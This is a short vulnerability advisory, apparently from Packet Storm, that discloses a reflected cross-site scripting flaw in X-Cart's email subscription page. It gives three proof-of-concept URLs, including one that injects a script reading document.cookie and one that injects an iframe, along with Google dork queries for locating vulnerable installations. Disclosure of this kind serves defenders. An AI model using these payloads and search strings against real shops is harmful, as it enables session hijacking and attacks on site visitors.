X-Cart Email Subscription Cross Site Scripting

2009-10-05T00:00:00
ID PACKETSTORM:81810
Type packetstorm
Reporter Paulo Santos
Modified 2009-10-05T00:00:00

Description

                                        
                                            `## X-Cart XSS in email subscription ##  
  
## Download: http://www.x-cart.com/ ##  
  
## Discovered by: Paulo Santos ##  
  
## Contact: paulo@infocampoap.com.br ##  
  
## Blog: http://infocampo.wordpress.com ##  
  
http://target/[path]/customer/home.php?mode=subscribed&email=<plaintext/>  
http://target/[path]/customer/home.php?mode=subscribed&email=<script>alert(document.cookie);//<</script>  
http://target/[path]/customer/home.php?mode=subscribed&email=<iframe src=http://www.google.com.br width=800>  
  
Path is usually /xcart/  
  
Google dork:  
inurl:xcart/customer/  
inurl:xcart/customer/home.php  
"X-CART. Powerful PHP shopping cart software"  
`